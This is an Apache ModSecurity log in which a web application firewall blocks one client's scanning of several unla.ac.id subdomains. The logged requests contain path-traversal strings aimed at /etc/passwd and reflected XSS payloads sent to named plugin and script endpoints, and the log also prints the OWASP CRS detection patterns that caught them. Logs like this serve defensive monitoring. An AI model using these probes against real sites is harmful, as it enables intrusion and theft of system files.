[Tue Aug 29 11:54:15.565728 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAox7R4AAAAN"]
[Tue Aug 29 11:54:16.575695 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoGFkYAAAAE"]
[Tue Aug 29 11:54:16.598821 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoUJikAAAAB"]
[Tue Aug 29 11:54:16.600338 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApk-ToAAAAn"]
[Tue Aug 29 11:54:16.607361 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApWY3AAAAAM"]
[Tue Aug 29 11:54:16.614501 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApZHTkAAAAf"]
[Tue Aug 29 11:54:16.628533 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoZ6a4AAAAK"]
[Tue Aug 29 11:54:16.640449 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApmXtYAAAAp"]
[Tue Aug 29 11:54:16.783671 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApWY3MAAAAM"]
[Tue Aug 29 11:54:16.808594 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoUJi0AAAAB"]
[Tue Aug 29 11:54:16.809406 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApk-T4AAAAn"]
[Tue Aug 29 11:54:17.556875 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@cCo-f0AAApZHT4AAAAf"]
[Tue Aug 29 11:54:17.654565 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO15@cCo-f0AAAo2nAAAAAAA"]
[Tue Aug 29 11:54:18.686157 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@sCo-f0AAAo2nAUAAAAA"]
[Tue Aug 29 11:54:20.823601 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoAk7gAAAAC"]
[Tue Aug 29 11:54:20.824434 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAor7uEAAAAk"]
[Tue Aug 29 11:54:20.924269 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoUJjIAAAAB"]
[Tue Aug 29 11:54:20.940271 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoGFlMAAAAE"]
[Tue Aug 29 11:54:20.948373 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAolKhIAAAAe"]
[Tue Aug 29 11:54:20.948563 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoUJjMAAAAB"]
[Tue Aug 29 11:54:20.949410 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAor7uMAAAAk"]
[Tue Aug 29 11:54:20.970186 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApjIMYAAAAm"]
[Tue Aug 29 11:54:21.013517 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApa-DwAAAAg"]
[Tue Aug 29 11:54:21.015057 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAApjIMcAAAAm"]
[Tue Aug 29 11:54:21.552898 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoAk74AAAAC"]
[Tue Aug 29 11:54:21.555003 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoGFlkAAAAE"]
[Tue Aug 29 11:54:21.555747 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoUJjUAAAAB"]
[Tue Aug 29 11:54:21.578928 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAor7uoAAAAk"]
[Tue Aug 29 11:54:21.579227 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAolKhkAAAAe"]
